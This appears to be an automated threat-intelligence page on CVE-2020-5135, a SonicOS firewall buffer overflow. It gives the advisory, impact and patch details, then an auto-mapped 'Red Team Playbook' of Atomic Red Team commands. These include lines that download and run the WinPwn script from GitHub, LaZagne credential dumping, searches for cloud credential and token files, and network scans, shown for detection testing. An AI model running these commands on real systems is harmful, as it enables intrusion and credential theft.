CVE-2020-5135
Overview
This vulnerability is a buffer overflow in the SonicWall SonicOS firewall software. It arises from improper bounds checking when processing certain network requests, allowing crafted input to overwrite memory. The flaw affects multiple SonicOS versions including Gen 6 (6.5.4.7, 6.5.1.12, 6.0.5.3), SonicOSv 6.5.4.v, and Gen 7 (7.0.0.0), specifically within the firewall's request handling components.
Vulnerability Description
A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.
Impact
An unauthenticated remote attacker can exploit this vulnerability to cause a Denial of Service by crashing the firewall or potentially execute arbitrary code with system-level privileges. This enables full compromise of the firewall device, allowing control over network traffic, bypassing security controls, or persistent access within the protected network environment. No user interaction or valid credentials are required, increasing the attack surface for external threat actors.
Solution
SonicWall has released patches addressing this buffer overflow in SonicOS versions 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v, and Gen 7 version 7.0.0.0. Administrators should apply the updates as detailed in SonicWall's advisory SNWLID-2020-0010, available at https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010. No alternative mitigations are specified; prompt patching is recommended to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical buffer overflow vulnerability has been identified in SonicOS, the operating system used by SonicWall firewalls. This flaw allows an attacker to send specially crafted requests that can overflow the buffer, leading to potential Denial of Service (DoS) conditions and the execution of arbitrary code. The affected versions include SonicOS Gen 6 (specifically versions 6.5.4.7, 6.5.1.12, and 6.0.5.3) as well as SonicOS Gen 7 (version 7.0.0.0). Buffer overflow vulnerabilities typically arise when a program writes more data to a block of memory, or buffer, than it was allocated, which can overwrite adjacent memory and lead to unpredictable behavior, including system crashes or unauthorized code execution.
Attack vectors for this vulnerability are particularly concerning due to the nature of firewall devices, which are often exposed to external networks. An attacker could exploit this vulnerability remotely by sending maliciously crafted packets to the firewall, bypassing traditional security measures. The exploitation could result in a complete system compromise, where the attacker gains control over the firewall, potentially allowing them to manipulate traffic, exfiltrate sensitive data, or launch further attacks on internal network resources. Additionally, the DoS condition could disrupt network services, impacting business operations and leading to significant downtime.
The real-world impact of this vulnerability is substantial, especially for organizations relying on SonicWall firewalls for network security. A successful attack could lead to severe business risks, including loss of data integrity, financial losses due to downtime, and damage to the organization’s reputation. Furthermore, if an attacker gains control over the firewall, they could pivot to other systems within the network, escalating the attack and causing even greater harm. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it poses a significant threat to organizations that have not implemented necessary security measures.
To detect and mitigate this vulnerability, organizations should adopt a multi-layered approach to security. Regularly updating SonicOS to the latest patched versions is essential to close the vulnerability. Network monitoring tools can help identify unusual traffic patterns that may indicate an attempted exploitation of the vulnerability. Additionally, implementing intrusion detection and prevention systems (IDPS) can provide an additional layer of defense by detecting and blocking malicious requests before they reach the firewall. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the buffer overflow vulnerability in SonicOS presents a serious threat to network security. Its ability to facilitate remote attacks and cause significant disruption makes it imperative for organizations to take immediate action to protect their systems. By staying informed about vulnerabilities, applying timely patches, and employing robust security measures, businesses can mitigate the risks associated with this and similar vulnerabilities, ensuring the integrity and availability of their network infrastructure.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2020-5135, reflecting a growing likelihood of exploitation attempts targeting the SonicOS buffer overflow vulnerability. This upward trend, while not rapid, signals heightened attacker interest and potential preparatory activity within threat actor communities. Although no new exploit techniques or ransomware campaigns have been directly linked to this vulnerability, the association with the Sinobi group remains noteworthy, underscoring persistent adversary focus. For defenders, this incremental rise in EPSS emphasizes the need to maintain vigilance, as the vulnerability’s critical severity combined with increased exploitation probability elevates the overall threat posture. Consequently, the risk assessment for CVE-2020-5135 should be adjusted to reflect a more imminent exploitation risk, warranting continued monitoring and prioritization within security operations.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonicwall | Sonicos | All |
cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sonicos | All |
cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sonicos | All |
cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sonicos | 7.0.0.0 |
cpe:2.3:o:sonicwall:sonicos:7.0.0.0:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sonicosv | All |
cpe:2.3:o:sonicwall:sonicosv:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (274 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-5135 |
| psirt.global.sonicwall.com |
GitHub CVE
x_refsource_CONFIRM
|
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5135 |